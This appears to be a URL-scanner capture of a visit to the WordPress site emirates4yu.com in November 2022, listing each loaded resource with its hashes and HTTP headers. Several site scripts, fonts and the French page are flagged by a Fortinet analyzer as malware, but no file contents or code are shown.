emirates4yu.com/wp-content/uploads/2018/12/bg-2-e1545337371901.jpg
35.190.203.220200 OK 126 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/bg-2-e1545337371901.jpg
IP 35.190.203.220:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2000x475, components 3\012- data
Size 126 kB (125546 bytes)
Hash c6da188f314f9ad58870303a9267c62d
bfda034a4cbde45fdcaa3ccd8ec2b97d9ad1792b
a59e71bcb8c8d5ee61050d4c95732d095efa43d3ae2ab62f4316227eb8308237
GET /wp-content/uploads/2018/12/bg-2-e1545337371901.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 125546
last-modified: Thu, 20 Dec 2018 20:22:51 GMT
etag: "5c1bfa1b-1ea6a"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/fonts/Ultimate-Icons.ttf?1ddi1j
35.190.203.220200 OK 93 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/fonts/Ultimate-Icons.ttf?1ddi1j
IP 35.190.203.220:0
File type TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, Ultimate-Icons\012- data
Hash 4f52acd8464d9611fe731e6182f1986e
a6367a5d19bd2b65265eee57e03068dca24be313
49f204eb11dd2940cb55d01fbe8f8f2fef9167ff1cb6e22bcecde06c0078f630
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/bb-plugin/icons/ultimate-icons/fonts/Ultimate-Icons.ttf?1ddi1j HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/octet-stream
content-length: 93024
last-modified: Sat, 01 Dec 2018 21:38:27 GMT
etag: "5c02ff53-16b60"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 87de3dd2c7dce12b01a337d1554a222a
30e0bd68bbb78995aa8a0686ac02848fd5a7a699
533c21806ef66401ea5faeeb37366a33f19f0e9052b4fb06f22981ec73b21a59
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 87de3dd2c7dce12b01a337d1554a222a
30e0bd68bbb78995aa8a0686ac02848fd5a7a699
533c21806ef66401ea5faeeb37366a33f19f0e9052b4fb06f22981ec73b21a59
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
35.190.203.220200 OK 24 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
IP 35.190.203.220:0
File type ASCII text, with very long lines (1472), with no line terminators
Hash 87c249bf15a90d1d241789d0eb653e5d
591c2b0b8722bd758154a14ce783058c7cfe9d8e
3afd99ef85be749b3913cb1fb6bf91cf0ecec0c7f7757a06b2abc5e2dc1b91be
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-5c0"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2
216.58.207.195200 OK 24 kB URL HTTP/2 fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 23580, version 1.0\012- data
Hash e1b3b5908c9cf23dfb2b9c52b9a023ab
fcd4136085f2a03481d9958cc6793a5ed98e714c
918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537
GET /s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 23580
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 17:10:21 GMT
expires: Wed, 22 Nov 2023 17:10:21 GMT
cache-control: public, max-age=31536000
age: 240699
last-modified: Tue, 26 Apr 2022 15:48:56 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.googletagmanager.com/gtm.js?id=GTM-NVX2RP2
142.250.74.168200 OK 57 kB URL HTTP/2 www.googletagmanager.com/gtm.js?id=GTM-NVX2RP2
IP 142.250.74.168:0
File type ASCII text, with very long lines (1921)
Hash 159a1b731e629b9083ca1afe14ffe6ad
ce62126b030dfec0d453b12333eb3c31f1836f93
ef569492e1d509fafa11f62e8e9a2279257dba6c7b3b050eec9460b850b4d429
GET /gtm.js?id=GTM-NVX2RP2 HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 12:02:00 GMT
expires: Fri, 25 Nov 2022 12:02:00 GMT
cache-control: private, max-age=900
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 57292
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/js/global-scripts/jquery-carousel.js?ver=6.0.3
35.190.203.220200 OK 82 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/js/global-scripts/jquery-carousel.js?ver=6.0.3
IP 35.190.203.220:0
File type ASCII text, with CRLF line terminators
Hash 59e1df5c4bebfd0ab672e4f2dbf72325
63e33c2943515341bad82b1a538cdf8c13d85b05
b4c031b94dcc30746727125276309f831aeccf4861f7e300ef77493c6f976182
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/bb-ultimate-addon/assets/js/global-scripts/jquery-carousel.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sat, 01 Dec 2018 21:30:58 GMT
etag: W/"5c02fd92-1549f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/Emirates4you.png
35.190.203.220200 OK 30 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/Emirates4you.png
IP 35.190.203.220:0
File type PNG image data, 600 x 253, 8-bit/color RGBA, interlaced\012- data
Hash b88bc0549f394221c658edcc7581291f
9cb4bb86f3d8bebd73a08f38f80c38dfe15a7557
63b882af4fdfe6841829ed234e846a90705d804882227f06b27e33c9fd283551
GET /wp-content/uploads/2018/12/Emirates4you.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 29711
last-modified: Wed, 19 Dec 2018 12:12:29 GMT
etag: "5c1a35ad-740f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 87de3dd2c7dce12b01a337d1554a222a
30e0bd68bbb78995aa8a0686ac02848fd5a7a699
533c21806ef66401ea5faeeb37366a33f19f0e9052b4fb06f22981ec73b21a59
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash a0111a2443450172e5d2b48d350a8f57
75e89d4cd001303e66a93880f96d6c47e7d665ab
c9865c82b8f373aeb3a7333b0f65408211d832aba753c35d3544ecb2913f4f64
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/fr/
35.190.203.220200 OK 29 kB IP 35.190.203.220:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (12468), with CRLF, LF line terminators
Hash 8db749956916588e6e83f4ea43f729ef
42f372285140cf41eaabe115036be7c9e00c2d3b
459831ffe67c4b8afd44f60aa41b4fc93c42eadc12bdbfa5f286218f44c795ca
Analyzer Verdict Alert fortinet Malware
GET /fr/ HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding,Cookie
link: <https://emirates4yu.com/wp-json/>; rel="https://api.w.org/", <https://emirates4yu.com/wp-json/wp/v2/pages/1735>; rel="alternate"; type="application/json", <https://wp.me/P8vXBD-rZ>; rel=shortlink
x-powered-by: WP Engine
x-cacheable: SHORT
cache-control: max-age=600, must-revalidate
x-cache: HIT: 1
x-cache-group: normal
content-encoding: br
X-Firefox-Spdy: h2
fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPGQ.woff2
216.58.207.195200 OK 22 kB URL HTTP/2 fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPGQ.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 22504, version 1.0\012- data
Hash 1c6c65523675abc6fcd78e804325bd77
898d9808304dc157f5dcb18ca169ec6e2b96b3d7
08664859baab5ed98f0bf818ed77e38464ff1826dc6406d5ecbd651409afbd92
GET /s/lato/v23/S6u9w4BMUTPHh50XSwiPGQ.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 22504
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 17:15:33 GMT
expires: Wed, 22 Nov 2023 17:15:33 GMT
cache-control: public, max-age=31536000
age: 240387
last-modified: Tue, 26 Apr 2022 16:04:16 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.magnificpopup.min.js?ver=2.2.6.3
35.190.203.220200 OK 310 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.magnificpopup.min.js?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (20154), with no line terminators
Size 310 kB (310281 bytes)
Hash dd03b63cde85668340d1aa364f239903
076f855893c9dfb1772acf8e92008672e4759b43
1b3f72af7e579f0e8af1a163709512cfd7fafbe32a4dc868b1bc5c0ee3c61321
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/beaver-builder-lite-version/js/jquery.magnificpopup.min.js?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-4eba"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/The-Great-Eight-Top-Tips-For.jpg
35.190.203.220200 OK 49 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/The-Great-Eight-Top-Tips-For.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1140x641, components 3\012- data
Hash 0b70c96b989f3c36cef75200f6d0016d
6893a60aa51eb097c025be28861fbf3a608e39f2
372b07e19dec813220d986a892827a961c4c519cb38bb982e9cbff0639af6ca0
GET /wp-content/uploads/2018/12/The-Great-Eight-Top-Tips-For.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 48927
last-modified: Tue, 18 Dec 2018 12:11:15 GMT
etag: "5c18e3e3-bf1f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/webfonts/fa-solid-900.woff2
35.190.203.220200 OK 75 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/webfonts/fa-solid-900.woff2
IP 35.190.203.220:0
File type Web Open Font Format (Version 2), TrueType, length 75440, version 329.-1049\012- data
Hash b5cf8ae26748570d8fb95a47f46b69e1
07bed153d47f9129a944ee54dd72952deed074c8
cd398be1a91817126cef10224738e624358edf6f08043abad7e60c1aaeccc8d0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: font/woff2
content-length: 75440
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: "5dfcf62d-126b0"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/ventures_01.jpg
35.190.203.220200 OK 26 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/ventures_01.jpg
IP 35.190.203.220:0
File type ISO Media, AVIF Image\012- data
Hash 51dbe7d55c68416b380b5e3c73a9e790
2981352d7e383d40788ae67ef11646d794ad2ae2
e27486ae2f84b621995b70a136c12d569521cd78786a6d252acccf156dce6449
GET /wp-content/uploads/2018/12/ventures_01.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 174143
last-modified: Sun, 09 Dec 2018 11:25:09 GMT
etag: "5c0cfb95-2a83f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
www.gstatic.com/recaptcha/releases/Km9gKuG06He-isPsP6saG8cn/recaptcha__en.js
142.250.74.163200 OK 163 kB URL HTTP/2 www.gstatic.com/recaptcha/releases/Km9gKuG06He-isPsP6saG8cn/recaptcha__en.js
IP 142.250.74.163:0
File type ASCII text, with very long lines (730)
Size 163 kB (162976 bytes)
Hash 79d18cf4265108d7cecca1bf4ada6109
e51d0285a545381d4c39e9e0292a650ffeeecbb9
59ce7253f371df0833c3f72d4748ef812002b90a49413c56d0ca7c40bb5a0ab6
GET /recaptcha/releases/Km9gKuG06He-isPsP6saG8cn/recaptcha__en.js HTTP/1.1
Host: www.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups; report-to="recaptcha"
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
content-length: 162976
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Fri, 25 Nov 2022 08:12:22 GMT
expires: Sat, 25 Nov 2023 08:12:22 GMT
cache-control: public, max-age=31536000
last-modified: Mon, 14 Nov 2022 03:01:59 GMT
content-type: text/javascript
age: 13778
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.waypoints.min.js?ver=2.2.6.3
35.190.203.220200 OK 31 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.waypoints.min.js?ver=2.2.6.3
IP 35.190.203.220:0
File type Unicode text, UTF-8 text, with very long lines (8668)
Hash 1a79d9d0b6f097ff4e4a7780df68afe9
5114d24f9feb4e6625aae274f0221ce7a31ca93f
6fc62f391138e892978a4f2438bbd81f4c282974c5ab38dc26000a0040026943
GET /wp-content/plugins/beaver-builder-lite-version/js/jquery.waypoints.min.js?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-2281"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2016/02/cropped-logo_golden-repl-32x32.png
35.190.203.220200 OK 1.6 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2016/02/cropped-logo_golden-repl-32x32.png
IP 35.190.203.220:0
File type PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced\012- data
Hash b3c6a000a2761fbff2827857b203e5ec
ccf7df9b5d2b93b902cccde303774ba8ba500d37
cd0f5d0e79a3f33bb8bec8ea5240c2f53a212d649eeaa93dce95b9808584d366
GET /wp-content/uploads/2016/02/cropped-logo_golden-repl-32x32.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 1576
last-modified: Thu, 05 Oct 2017 11:37:14 GMT
etag: "59d6196a-628"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
pixel.wp.com/g.gif?v=ext&j=1%3A9.0.3&blog=125827985&post=1735&tz=5.5&srv=emirates4yu.com&host=emirates4yu.com&ref=&fcp=1375&rand=0.1830355921792789
